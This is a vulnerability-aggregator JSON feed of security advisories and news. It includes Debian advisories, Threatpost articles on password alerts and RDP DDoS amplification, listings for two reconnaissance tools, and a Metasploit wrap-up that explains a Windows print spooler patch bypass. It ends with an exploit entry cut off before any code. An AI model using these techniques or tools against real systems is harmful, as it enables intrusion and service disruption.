{"id": "DEBIAN:DSA-2599-1:32194", "bulletinFamily": "unix", "title": "[SECURITY] [DSA 2599-1] nss security update", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2599-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nJanuary 06, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : nss\nVulnerability : mis-issued intermediates\nProblem type : remote\nDebian-specific: no\n\nGoogle, Inc. discovered that the TurkTrust certification authority\nincluded in the Network Security Service libraries (nss) mis-issued\ntwo intermediate CA's which could be used to generate rogue end-entity\ncertificates. This update explicitly distrusts those two intermediate\nCA's. The two existing TurkTrust root CA's remain active.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 3.12.8-1+squeeze6.\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 2:3.13.6-2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2:3.14.1.with.ckbi.1.93-1.\n\nWe recommend that you upgrade your nss packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "published": "2013-01-06T14:42:57", "modified": "2013-01-06T14:42:57", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2013/msg00002.html", "reporter": "Debian", "references": [], "cvelist": [], "type": "debian", "lastseen": "2020-11-11T13:28:14", "edition": 6, "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "krebs", "idList": ["KREBS:613A537780BD40A6F8E0047CE8D3E6EC"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:E81356C3A8F6EE7D3CD8C2BB88F09BF3"]}, {"type": "ubuntu", "idList": ["USN-4628-1", "USN-4627-1", "USN-4626-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:49028", "EDB-ID:49029", "EDB-ID:49030"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2443-1:D82F0", "DEBIAN:DLA-2446-1:15C3D", "DEBIAN:DSA-4788-1:13EE2", "DEBIAN:DLA-2445-1:FB62C", "DEBIAN:DLA-2444-1:A3E15"]}, {"type": "kitploit", "idList": ["KITPLOIT:920894952105269509"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1893-1"]}, {"type": "redhat", "idList": ["RHSA-2020:5050"]}, {"type": "mssecure", "idList": ["MSSECURE:81887A858FFF9905ECF3C79D1859E811"]}, {"type": "mmpc", "idList": ["MMPC:81887A858FFF9905ECF3C79D1859E811"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:1A5170F2C20066B9A44DE164B0147BE4"]}], "modified": "2020-11-11T13:28:14", "rev": 2}, "score": {"value": 2.7, "vector": "NONE", "modified": "2020-11-11T13:28:14", "rev": 2}, "vulnersScore": 2.7}, "affectedPackage": [{"OS": "Debian", "OSVersion": "6", "arch": "all", "operator": "lt", "packageFilename": "nss_3.12.8-1+squeeze6_all.deb", "packageName": "nss", "packageVersion": "3.12.8-1+squeeze6"}], "scheme": null}

{"threatpost": [{"lastseen": "2021-01-22T22:15:46", "bulletinFamily": "info", "cvelist": [], "description": "Two major browsers \u2013Microsoft Edge and Google Chrome \u2013 are rolling out default features, which they say will better help notify users if their password has been compromised as part of a breach or database exposure.\n\nEdge and Chrome\u2019s moves signify a bigger push by browsers to solve the [big \u201cpassword problem\u201d](<https://threatpost.com/troy-hunt-messy-password-problem/145439/>) plaguing the security industry. Over the past two years, major browsers (including [Mozilla Firefox)](<https://threatpost.com/mozilla-announces-firefox-monitor-tool-testing-firefox-61/133087/>) have launched built-in tools for helping users identify passwords that are increasingly wrapped up in data breaches \u2013 and easily change them.\n\n## Microsoft Password Monitor\n\nMicrosoft [on Thursday](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnote-stable-channel>) said that its next version of Edge (version 88.0.705.50) will generate alerts if a user password is found in an online leak. The tool, called Password Monitor, will check users\u2019 passwords against a data repository of known, breached credentials. If the passwords saved to the browser matches those on a list of leaked credentials, Password Monitor will send users alerts and prompt them to update their password.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cTo ensure security and privacy, user passwords are hashed and encrypted when they\u2019re checked against the database of leaked credentials,\u201d said Microsoft.\n\nIn addition, Microsoft\u2019s newest Edge version will include a built-in \u201cstrong password generator,\u201d which it hopes will promote strong passwords for internet users who are signing up for a new account, or changing an existing password.\n\nSecurity experts applauded the new measures. \u201cBy having the password management feature in the browsers look for compromised credentials, it allows the potential victim to change the password in other places before it impacts them,\u201d Erich Kron, security awareness advocate at KnowBe4 told Threatpost. \u201cHopefully, it will also demonstrate to the individual the importance of not reusing passwords across multiple services.\u201d\n\n## Google Chrome\u2019s Latest Password Protections\n\nMeanwhile, [Google this week announced](<https://security.googleblog.com/2021/01/new-year-new-password-protections-in.html>) it will introducing new features that will consolidate its password protections \u2013 and make them for seamless for users \u2013 in Chrome 88 over the coming weeks. Chrome 88 will give allow users to launch a simple check to identify any weak passwords and \u201ctake action easily.\u201d By navigating to the top of their browser and clicking on passwords and \u201cCheck Passwords,\u201d users are able to easily check whether all of their passwords have been compromised in a breach \u2013 and on the same page edit their passwords to choose safer alternatives if need be.\n\nChrome [already alerts users if their passwords have been compromised](<https://threatpost.com/google-adds-password-checkup-feature-to-chrome-browser/148838/>) and prompts them to update \u2013 However, the idea here is to give users the ability to update multiple usernames and passwords easily all in one place.\n\n\u201cThat\u2019s why starting in Chrome 88, you can manage all of your passwords even faster and easier in Chrome Settings on desktop and iOS (Chrome\u2019s Android app will be getting this feature soon, too),\u201d said Google.\n\nChrome also provided an update on its existing password protection tools, including Safety Check, launched in 2020, which tells Chrome users if passwords they\u2019ve asked the browser to remember have been compromised. Google said as a result of Safety Check it has seen a 37 percent reduction in compromised credentials stored in Chrome.\n\n## Password Health Continues to Fail\n\nWith data breaches continuing to hit companies, attackers are accessing credentials across the board. However, compromised data isn\u2019t leading to actionable changes by consumers \u2013 in fact [a 2020 survey found that half of respondents](<https://threatpost.com/threatlist-people-know-reusing-passwords-is-dumb-but-still-do-it/155996/>) hadn\u2019t changed their password in the last year \u2013 even after they heard [about a data breach](<https://threatpost.com/healthcare-giant-magellan-ransomware-data-breach/155699/>) in the news. This \u201cpassword problem\u201d has challenged the security industry for years, with companies grappling with issues like poor password hygiene, password reuse or easy-to-guess passwords. Making matters worse, passwords are appearing left and right online as part of major data breaches \u2013 yet victims aren\u2019t changing their passwords at all across various platforms. The [Collection #1](<https://threatpost.com/773m-credentials-dark-web/140972/>) data dump in 2019 for instance, which included 773 million credentials, and subsequent [Collection #2-5 dumps](<https://threatpost.com/collection-1-data-dump-hacker-identified/141447/>), show exactly how many passwords are available on the Dark Web and underground forums.\n\n\u201cPassword compromise is a huge ongoing issue leading to everything from data breaches to ransomware or other malware infections,\u201d Kron said. \u201cThis in large part due to the practice of credential stuffing. This is where cybercriminals take known usernames and passwords from previous breaches and attempt to use them on other services. Knowing that people tend to reuse passwords across multiple services, they know the odds of success are worth the effort.\u201d\n\nLamar Bailey, senior director of security research with Tripwire, said that passwords are \u201cthe Achilles heel of cybersecurity.\u201d\n\n\u201cThe vast majority of breaches start with stolen, weak or reused passwords,\u201d Bailey said. \u201cOur brains can\u2019t keep up with a long list of passwords that map to all of the various sites, assets and services we access on a given day. Third-party password vaults\u2026 have become the de facto standard to solve this problem. With the latest update, Chrome and Edge will be competing with these third-party products by offering some of the same features.\u201d\n\n**Download our exclusive **[**FREE Threatpost Insider eBook**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook>) _**Healthcare Security Woes Balloon in a Covid-Era World**_**, sponsored by ZeroNorth, to learn more about what these security risks mean for hospitals at the day-to-day level and how healthcare security teams can implement best practices to protect providers and patients. Get the whole story and **[**DOWNLOAD the eBook now**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)** \u2013 on us!**\n", "modified": "2021-01-22T21:57:10", "published": "2021-01-22T21:57:10", "id": "THREATPOST:B2E59AD3F86FBC694619A8305DE20D3F", "href": "https://threatpost.com/microsoft-edge-google-chrome-roll-out-password-protection-tools/163272/", "type": "threatpost", "title": "Microsoft Edge, Google Chrome Roll Out Password Protection Tools", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-22T12:56:02", "bulletinFamily": "info", "cvelist": [], "description": "Cybercriminals can exploit Microsoft Remote Desktop Protocol (RDP) as a powerful tool to amplify distributed denial-of-service (DDoS attacks), new research has found.\n\nAttackers can abuse RDP to launch UDP reflection/amplification attacks with an amplification ratio of 85.9:1, principal engineer Roland Dobbins and senior network security analyst Steinthor Bjarnason from Netscout said in [a report](<https://www.netscout.com/blog/asert/microsoft-remote-desktop-protocol-rdp-reflectionamplification>) published online this week.\n\nHowever, not all RDP servers can be used in this way. It\u2019s possible only when the service is enabled on port UDP port 3389 running on standard TCP port 3389, researchers said. \n[](<https://threatpost.com/2020-reader-survey/161168/>)\n\nNetscout so far has identified more than 14,000 \u201cabusable\u201d Windows RDP servers that can be misused by attackers in DDoS attacks\u2014troubling news at a time when this type of attack is [on the rise](<https://threatpost.com/ddos-attacks-cresting-pandemic/158211/>) due to the increased volume of people online during the ongoing [coronavirus pandemic.](<https://threatpost.com/ddos-attacks-skyrocket-pandemic/159301/>)\n\nThis risk was highlighted earlier this week when researchers identified a new malware variant [dubbed Freakout](<https://threatpost.com/linux-attack-freakout-malware/163137/>) adding endpoints to a botnet to target Linux devices with DDoS attacks.\n\nWhat\u2019s more, while initially only advanced attackers with access to \u201cbespoke DDoS attack infrastructure\u201d used this method of amplification, researchers also observed RDP servers being abused in [DDoS-for-hire](<https://threatpost.com/fbi-ddos-for-hire/140280/>) services by so-called \u201cbooters,\u201d they said. This means \u201cthe general attacker population\u201d can also use this mode of amplification to add heft to their [DDoS attacks](<https://threatpost.com/law-enforcement-targets-users-of-ddos-for-hire-services/122465/>).\n\nRDP is a part of the Microsoft Windows OS that provides authenticated remote virtual desktop infrastructure (VDI) access to Windows-based workstations and servers. System administrators can configure RDP to run on TCP port 3389 and/or UDP port 3389.\n\nAttackers can send the amplified attack traffic, which is comprised of non-fragmented UDP packets that originate at UDP port 3389, to target a particular IP address and UDP port of choice, researchers said.\n\n\u201cIn contrast to legitimate RDP session traffic, the amplified attack packets are consistently 1,260 bytes in length, and are padded with long strings of zeroes,\u201d Dobbins and Bjarnason explained.\n\nLeveraging Windows RDP servers in this way has significant impact on victim organizations, including \u201cpartial or full interruption of mission-critical remote-access services,\u201d as well as other service disruptions due to transit capacity consumption and associated effects on network infrastructure, researchers said.\n\n\u201cWholesale filtering of all UDP/3389-sourced traffic by network operators may potentially overblock legitimate internet traffic, including legitimate RDP remote-session replies,\u201d researchers noted.\n\nTo mitigate the use of RDP to amplify DDoS attacks and their related impact, researchers made a number of suggestions to Windows systems administrators. First and foremost they should deploy Windows RDP servers behind VPN concentrators to prevent them from being abused to amplify DDoS attacks, they said.\n\n\u201cNetwork operators should perform reconnaissance to identify abusable Windows RDP servers on their networks and/or the networks of their downstream customers,\u201d Dobbins and Bjarnason advised. \u201cIt is strongly recommended that RDP servers should be accessible only via VPN services in order to shield them from abuse.\u201d\n\nIf this mitigation is not possible, however, they \u201cstrongly recommended\u201d that at the very least, system administrators disable RDP via UDP port 3389 \u201cas an interim measure,\u201d they said.\n\nInternet access network traffic from internal organizational personnel should be deconflated from internet traffic to/from public-facing internet properties and served via separate upstream internet transit links.\n\nAt the same time, network operators should implement Best Current Practices (BCPs) for all relevant network infrastructure, architecture and operations, including \u201csituationally specific network-access policies that only permit internet traffic via required IP protocols and ports, researchers said.\n\nInternet-access network traffic from internal organizational personnel also should be deconflated from internet traffic to/from public-facing internet properties and served via separate upstream internet transit links, they added.\n\n**Download our exclusive **[**FREE Threatpost Insider eBook**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook>) _**Healthcare Security Woes Balloon in a Covid-Era World**_**, sponsored by ZeroNorth, to learn more about what these security risks mean for hospitals at the day-to-day level and how healthcare security teams can implement best practices to protect providers and patients. Get the whole story and **[**DOWNLOAD the eBook now**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)** \u2013 on us!**\n", "modified": "2021-01-22T12:45:42", "published": "2021-01-22T12:45:42", "id": "THREATPOST:404B86130415376C2173D576AAD37DC8", "href": "https://threatpost.com/threat-actors-can-exploit-windows-rdp-servers-to-amplify-ddos-attacks/163248/", "type": "threatpost", "title": "Threat Actors Can Exploit Windows RDP Servers to Amplify DDoS Attacks", "cvss": {"score": 0.0, "vector": "NONE"}}], "kitploit": [{"lastseen": "2021-01-23T00:35:54", "bulletinFamily": "tools", "cvelist": [], "description": "[  ](<https://1.bp.blogspot.com/-ueWK3GEAOH0/YAZxDhUjItI/AAAAAAAAVC0/s33g-fYEfqYEWypbNtXa-zDZm5he2bd-ACNcBGAsYHQ/s777/sigurlx.png>)\n\n \n\n\nsigurlx a web application attack surface mapping tool, it does ...: \n\n * Categorize URLs URLs' categories: \n \n > endpoint \n > js {js} \n > style {css} \n > data {json|xml|csv} \n > archive {zip|tar|tar.gz} \n > doc {pdf|xlsx|doc|docx|txt} \n > media {jpg|jpeg|png|ico|svg|gif|webp|mp3|mp4|woff|woff2|ttf|eot|tif|tiff} \n \n\n * Next, probe HTTP requests to the URLs for ` status_code ` , ` content_type ` , e.t.c \n * Next, for every URL of category ` endpoint ` with a query: \n * Probe for commonly [ vulnerable ](<https://www.kitploit.com/search/label/Vulnerable> \"vulnerable\" ) parameters (inspired by [ Somdev Sangwan ](<https://github.com/s0md3v> \"Somdev Sangwan\" ) 's [ Parth ](<https://github.com/s0md3v/Parth> \"Parth\" ) ). \n * Probe for reflected parameters (inspired by [ Tom Hudson ](<https://github.com/tomnomnom> \"Tom Hudson\" ) 's [ kxss ](<https://github.com/tomnomnom/hacks/tree/master/kxss> \"kxss\" ) ). \n \n** Usage ** \n\n\nTo display help message for sigurlx use the ` -h ` flag: \n \n \n $ sigurlx -h \n \n _ _ \n ___(_) __ _ _ _ _ __| |_ __ \n / __| |/ _` | | | | '__| \\ \\/ / \n \\__ \\ | (_| | |_| | | | |> < \n |___/_|\\__, |\\__,_|_| |_/_/\\_\\ v2.1.0 \n |___/ \n \n USAGE: \n sigurlx [OPTIONS] \n \n GENERAL OPTIONS: \n -iL input urls list (use `-iL -` to read from stdin) \n -threads number concurrent threads (default: 20) \n -update-params update params file \n \n HTTP OPTIONS: \n -delay delay between requests (default: 100ms) \n -follow-redirects follow redirects (default: false) \n -follow-host-redirects follow internal redirects i.e, same host redirects (default: false) \n -http-proxy HTTP Proxy URL \n -timeout HTTP request timeout (default: 10s) \n -UA HTTP user agent \n \n OUTPUT OPTIONS: \n -nC no color mode \n -oJ [JSON](<https://www.kitploit.com/search/label/JSON> \"JSON\" ) output file (default: ./sigurlx.json) \n -v verbose mode \n \n\n \n** Installation ** \n \n** From Binary ** \n\n\nYou can download the pre-built [ binary ](<https://www.kitploit.com/search/label/Binary> \"binary\" ) for your platform from this repository's [ releases ](<https://github.com/drsigned/sigurlx/releases/> \"releases\" ) page, extract, then move it to your ` $PATH ` and you're ready to go. \n\n \n** From Source ** \n\n\nsigurlx requires ** go1.14+ ** to install successfully. Run the following command to get the repo \n \n \n \u25b6 go get -u github.com/drsigned/sigurlx/cmd/sigurlx\n\n \n** From Github ** \n\n \n \n \u25b6 git clone https://github.com/drsigned/sigurlx.git \n \u25b6 cd sigurlx/cmd/sigurlx/ \n \u25b6 go build . \n \u25b6 mv sigurlx /usr/local/bin/ \n \u25b6 sigurlx -h \n \n\n \n** Contribution ** \n\n\n[ Issues ](<https://github.com/drsigned/sigurlx/issues> \"Issues\" ) and [ Pull Requests ](<https://github.com/drsigned/sigurlx/pulls> \"Pull Requests\" ) are welcome! \n\n \n \n\n\n** [ Download Sigurlx ](<https://github.com/drsigned/sigurlx> \"Download Sigurlx\" ) **\n", "edition": 1, "modified": "2021-01-22T20:30:11", "published": "2021-01-22T20:30:11", "id": "KITPLOIT:5008282317496220189", "href": "http://www.kitploit.com/2021/01/sigurlx-web-application-attack-surface.html", "title": "Sigurlx - A Web Application Attack Surface Mapping Tool", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-22T15:28:39", "bulletinFamily": "tools", "cvelist": [], "description": "[  ](<https://1.bp.blogspot.com/-bfAxGXmQzfM/YAZvM80kNhI/AAAAAAAAVCs/E9iStALH72sxapjM7B3vbXkcECsvqN5igCNcBGAsYHQ/s758/MetaFinder.png>)\n\n \n\n\nSearch For Documents In A Domain Through Google. The Objective Is To Extract Metadata. \n\n\n \n\n\n** Installing dependencies: ** \n\n \n \n > git clone https://github.com/Josue87/MetaFinder.git \n > cd MetaFinder \n > pip3 install -r requirements.txt \n \n\n \n** Usage ** \n\n \n \n python3 metafinder.py -t domain.com -l 20 [-v] \n \n\nParameters: \n\n * t: Specifies the target domain. \n * l: Specify the maximum number of results to be searched. \n * v: Optional. It is used to display the results on the screen as well. \n \n** Author ** \n\n\nThis project has been developed by: \n\n * ** Josu\u00e9 Encinar Garc\u00eda ** \\-- [ @JosueEncinar ](<https://twitter.com/JosueEncinar> \"@JosueEncinar\" )\n \n** Disclaimer! ** \n\n\nThis Software has been developed for teaching purposes and for use with permission of a potential target. The author is not responsible for any illegitimate use. \n\n \n \n\n\n** [ Download MetaFinder ](<https://github.com/Josue87/MetaFinder> \"Download MetaFinder\" ) **\n", "edition": 1, "modified": "2021-01-22T11:30:08", "published": "2021-01-22T11:30:08", "id": "KITPLOIT:4168344283678018741", "href": "http://www.kitploit.com/2021/01/metafinder-search-for-documents-in.html", "title": "MetaFinder - Search For Documents In A Domain Through Google", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}], "rapid7blog": [{"lastseen": "2021-01-22T21:41:05", "bulletinFamily": "info", "cvelist": ["CVE-2020-1048", "CVE-2020-1337", "CVE-2020-29583"], "description": "\n\nMetasploit Wrapup\n\n## Windows print spooler vulnerability...again\n\nHere we have [bwatters-r7](<https://github.com/bwatters-r7>) coming in with an exploit for [CVE-2020-1337](<https://attackerkb.com/topics/mEEwlfrTK3/cve-2020-1337?referrer=blog>), a patch bypass for a Windows print spooler elevation of privilege vulnerability that was exploited in the wild last year. The original vulnerability, [CVE-2020-1048](<https://attackerkb.com/topics/QoQvwrIqEV/cve-2020-1048-windows-print-spooler-elevation-of-privilege-vulnerability?referrer=blog>), garnered quite a bit of interest from the security community, in large part because the Windows print spooler is a legacy component that was abused as part of the Stuxnet attack. Alex Ionescu and Yarden Shafir, the researchers who discovered CVE-2020-1048, have [a great write-up here](<https://windows-internals.com/printdemon-cve-2020-1048/>) if you\u2019re looking for a deep dive.\n\nThe first patch that Microsoft released for [CVE-2020-1048](<https://attackerkb.com/topics/QoQvwrIqEV/cve-2020-1048-windows-print-spooler-elevation-of-privilege-vulnerability?referrer=blog>) uses a check to verify that the process creating a printer port targeting a location has privileges to write to that location. Unfortunately, that patch only checks the permissions when the port is created. The bypass utilized here simply creates the port pointing to a location the user can write \nto. Then, after the printer port is created, it creates a symlink from \nthe location pointed to by the printer port to a second location. The check will pass because the link is only created after the check, but the link will be in place when the print takes place, so the file write will pass through and end up in the trusted location.\n\n## A very prompt fix\n\n[Chiggins](<https://github.com/Chiggins>) gave us a fix for the msfconsole prompt with PR [#14635](<https://github.com/rapid7/metasploit-framework/pull/14635>). For those not in the know, you can set your prompt in the console with the `set Prompt` command. Thanks to [Chiggins](<https://github.com/Chiggins>) setting your prompt to the timestamp works again! So feel free to give it a go with `set Prompt %T`.\n\n## New Modules (1)\n\n * [Microsoft Spooler Local Privilege Elevation Vulnerability](<https://github.com/rapid7/metasploit-framework/pull/14414>) by 404death, Peleg Hadar, Tomer Bar, bwatters-r7, and sailay1996, which exploits [CVE-2020-1337](<https://attackerkb.com/topics/mEEwlfrTK3/cve-2020-1337?referrer=blog>) This adds a local exploit module that leverages an arbitrary file write vulnerability in the Spooler service on Windows. This is a bypass of the patch for [CVE-2020-1048](<https://attackerkb.com/topics/QoQvwrIqEV/cve-2020-1048-windows-print-spooler-elevation-of-privilege-vulnerability?referrer=blog>) and is identified as [CVE-2020-1337](<https://attackerkb.com/topics/mEEwlfrTK3/cve-2020-1337?referrer=blog>). By successfully executing this exploit, it is possible to gain code execution as `NT AUTHORITY\\SYSTEM`.\n\n## Enhancements and features\n\n * [#14583](<https://github.com/rapid7/metasploit-framework/pull/14583>) from [dwelch-r7](<https://github.com/dwelch-r7>) This PR adds in the ability for framework to detect when a given nmap scan requires sudo privileges and re-runs nmap with sudo prompting the user in the typical way\n * [#14621](<https://github.com/rapid7/metasploit-framework/pull/14621>) from [geyslan](<https://github.com/geyslan>) This PR reduces the size of the linux/x64/shell_bind_tcp_random_port payload and maintains the functionality.\n * [#14630](<https://github.com/rapid7/metasploit-framework/pull/14630>) from [h00die](<https://github.com/h00die>) Adds the hardcoded creds found in Zyxel devices to the unix creds files - as captured within [CVE-2020-29583](<https://attackerkb.com/topics/FJI292KsKw/cve-2020-29583-zyxel-usg-hard-coded-admin-creds?referrer=blog>)\n\n## Bugs Fixed\n\n * [#14597](<https://github.com/rapid7/metasploit-framework/pull/14597>) from [arno01](<https://github.com/arno01>) Updates the `modules/auxiliary/gather/external_ip.rb` module to provide a valid default vhost setting\n * [#14609](<https://github.com/rapid7/metasploit-framework/pull/14609>) from [dwelch-r7](<https://github.com/dwelch-r7>) A bug was fixed in the `lib/msf/core/exploit/remote/http_client.rb` and `lib/msf/core/opt_http_rhost_url.rb` libraries whereby if a user used a `/etc/hosts` entry for resolving a hostname to an IP address, the `VHOST` datastore variable would be set incorrectly. This has now been resolved by improving the logic of these two libraries and updating the spec checks accordingly.\n * [#14632](<https://github.com/rapid7/metasploit-framework/pull/14632>) from [zomfg-zombie](<https://github.com/zomfg-zombie>) This fixes a compatibility issue with the OpenSMTPD MAIL FROM RCE exploit where it was failing to function when the target host's shell uses a strictly POSIX compatible `read` utility as is the case in Ubuntu.\n * [#14635](<https://github.com/rapid7/metasploit-framework/pull/14635>) from [Chiggins](<https://github.com/Chiggins>) A bug was fixed in the `lib/rex/ui/text/shell.rb` library whereby users who used the `%T` character within their command prompts would not get the full timestamp information. A fix has been applied to address this regression so that users can now get the full timestamp information within their prompts.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.26...6.0.27](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-01-14T17%3A51%3A07%2B00%3A00..2021-01-21T12%3A45%3A57-06%3A00%22>)\n * [Full diff 6.0.26...6.0.27](<https://github.com/rapid7/metasploit-framework/compare/6.0.26...6.0.27>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "modified": "2021-01-22T19:21:10", "published": "2021-01-22T19:21:10", "id": "RAPID7BLOG:6C35956D233D9B5624F58F0FD8F44B43", "href": "https://blog.rapid7.com/2021/01/22/metasploit-wrap-up-95/", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2021-01-23T01:28:32", "bulletinFamily": "unix", "cvelist": ["CVE-2020-27827", "CVE-2015-8011"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4836-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nJanuary 22, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : openvswitch\nCVE ID : CVE-2015-8011 CVE-2020-27827\nDebian Bug : 980132\n\nTwo vulnerabilities were discovered in the LLPD implementation of Open\nvSwitch, a software-based Ethernet virtual switch, which could result in\ndenial of service.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2.10.6+ds1-0+deb10u1.\n\nWe recommend that you upgrade your openvswitch packages.\n\nFor the detailed security status of openvswitch please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/openvswitch\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 1, "modified": "2021-01-22T18:52:36", "published": "2021-01-22T18:52:36", "id": "DEBIAN:DSA-4836-1:58FDD", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2021/msg00015.html", "title": "[SECURITY] [DSA 4836-1] openvswitch security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-23T01:14:03", "bulletinFamily": "unix", "cvelist": ["CVE-2020-17527", "CVE-2020-13943"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4835-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nJanuary 22, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : tomcat9\nCVE ID : CVE-2020-13943 CVE-2020-17527\n\nTwo vulnerabilities were discovered in the Tomcat servlet and JSP\nengine, which could result in information disclosure.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 9.0.31-1~deb10u3.\n\nWe recommend that you upgrade your tomcat9 packages.\n\nFor the detailed security status of tomcat9 please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/tomcat9\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 1, "modified": "2021-01-22T18:49:04", "published": "2021-01-22T18:49:04", "id": "DEBIAN:DSA-4835-1:22674", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2021/msg00014.html", "title": "[SECURITY] [DSA 4835-1] tomcat9 security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-23T01:25:03", "bulletinFamily": "unix", "cvelist": ["CVE-2020-26664"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4834-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nJanuary 22, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : vlc\nCVE ID : CVE-2020-26664\nDebian Bug : 979676\n\nMultiple vulnerabilities were discovered in the VLC media player, which\ncould result in the execution of arbitrary code or denial of service if\na malformed media file is opened.\n\nFor the stable distribution (buster), this problem has been fixed in\nversion 3.0.12-0+deb10u1.\n\nWe recommend that you upgrade your vlc packages.\n\nFor the detailed security status of vlc please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/vlc\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 1, "modified": "2021-01-22T18:48:08", "published": "2021-01-22T18:48:08", "id": "DEBIAN:DSA-4834-1:E9D18", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2021/msg00013.html", "title": "[SECURITY] [DSA 4834-1] vlc security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2021-01-22T02:35:15", "bulletinFamily": "unix", "cvelist": ["CVE-2021-1723"], "description": ".NET Core is a fast, lightweight and modular platform for creating cross platform applications that work on Linux, macOS and Windows. It particularly focuses on creating console applications, web applications and micro-services. .NET Core contains a runtime conforming to .NET Standards a set of framework libraries, an SDK containing compilers and a 'dotnet' application to drive everything. ", "modified": "2021-01-22T01:34:19", "published": "2021-01-22T01:34:19", "id": "FEDORA:F2B8830D7952", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: dotnet3.1-3.1.111-1.fc33", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-22T02:35:15", "bulletinFamily": "unix", "cvelist": ["CVE-2021-1723"], "description": ".NET Core is a fast, lightweight and modular platform for creating cross platform applications that work on Linux, macOS and Windows. It particularly focuses on creating console applications, web applications and micro-services. .NET Core contains a runtime conforming to .NET Standards a set of framework libraries, an SDK containing compilers and a 'dotnet' application to drive everything. ", "modified": "2021-01-22T01:31:48", "published": "2021-01-22T01:31:48", "id": "FEDORA:23E3230CAEC3", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: dotnet3.1-3.1.111-1.fc32", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "packetstorm": [{"lastseen": "2021-01-22T15:47:25", "description": "", "published": "2021-01-22T00:00:00", "type": "packetstorm", "title": "Atlassian Confluence 6.12.1 Template Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-3396"], "modified": "2021-01-22T00:00:00", "id": "PACKETSTORM:161065", "href": "https://packetstormsecurity.com/files/161065/Atlassian-Confluence-6.12.1-Template-Injection.html", "sourceData": "`# 